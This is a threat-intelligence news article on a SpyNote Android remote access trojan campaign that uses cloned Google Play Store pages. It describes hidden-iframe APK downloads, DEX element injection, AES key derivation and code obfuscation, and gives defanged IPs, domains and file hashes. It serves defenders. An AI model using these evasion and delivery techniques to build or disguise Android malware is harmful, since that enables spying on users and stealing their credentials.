Fake Google Play Store Websites Deliver Potent RAT to Steal Sensitive Data

Cybersecurity researchers have uncovered a persistent campaign deploying the AndroidOS SpyNote malware, a sophisticated Remote Access Trojan (RAT) designed for surveillance, data exfiltration, and remote device control.

This operation mimics legitimate Google Play Store pages for popular Android apps, tricking users into downloading malicious APK files.

The campaign, linked to the same threat actor previously detailed in an April DomainTools Intelligence (DTI) report, demonstrates minor evolutions in tactics, including shifts in IP resolutions and enhanced anti-analysis measures within the APK dropper to shield the SpyNote payload from detection.

SpyNote Campaign Targets Android Users

SpyNote’s capabilities are extensive, encompassing remote access to device cameras and microphones, call management, command execution, keylogging for credential theft, and exploitation of Android Accessibility Services to intercept two-factor authentication (2FA) codes.

When granted administrator privileges, it enables data wiping, device locking, or installation of additional malware, positioning it as a high-risk tool for espionage and financial cybercrime.

The deceptive websites are static HTML and CSS clones of authentic Play Store interfaces, hosted on domains registered via registrars like NameSilo, LLC, and XinNet Technology Corporation.

These sites resolve to IPs associated with providers such as Lightnode Limited and Vultr Holdings LLC, utilizing nginx servers and SSL certificates from issuers like R10 and R11.

Nameservers from dnsowl[.]com and xincache[.]com are common, with prominent resolutions to addresses like 154.90.58[.]26 and 199.247.6[.]61.

Embedded scripts, including references to unpkg[.]com/[email protected] and obfuscated strings such as “sBw2N8uateIzRr93vmFze5MF_35vMk5F1wG04L5JcJE”, facilitate the download mechanism.

Upon clicking the fake “Install” button, a JavaScript function creates a hidden iframe to trigger the APK download without navigating away from the page.

Evolved Malware Delivery

The malware execution chain begins with an initial dropper APK, such as Chrome.apk (SHA-256: 48aa5f908fa612dcb38acf4005de72b9379f50c7e1bc43a4e64ce274bb7566e8), which decrypts an encrypted payload using an AES key derived from the manifest’s package name, like “rogcysibz.wbnyvkrn.sstjjs” yielding “62646632363164386461323836333631”.

This dropper employs DEX Element Injection via reflection to modify the ClassLoader at runtime, inserting malicious code ahead of legitimate elements to evade static analysis and hijack app functions for data interception.

It combines and decrypts assets from files 000 and 001, decompressing them into the core SpyNote APK (SHA-256: 86e8d3716318e9bb63b86aebe185db5db6718cb3ddea7fbafefa8ebfb674b9e8), which then dynamically loads a DEX file containing command-and-control (C2) logic.

Recent samples incorporate control flow and identifier obfuscation, using variations of ‘o’, ‘O’, and ‘0’ to obscure code logic and hinder reverse engineering.

The C2 connection is established via WebSocket URLs selected from a hardcoded domain list, enhancing resilience.

The threat actor targets a broad range of spoofed apps, including social platforms like iHappy and CamSoda, games such as 8 Ball Pool, and utilities like Chrome, indicating opportunistic, financially motivated attacks on consumers.

Infrastructure remains limited to two primary IPs, with rotations but no major diversification, and delivery code includes Chinese comments, though attribution is unclear.

This campaign underscores the enduring threat of mobile RATs through social engineering, despite the actor’s modest technical sophistication.

Recommendations include bolstering browser warnings against fake sites, advancing antivirus detection for obfuscated APKs, and integrating VPN-level filtering for malicious C2 connections.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!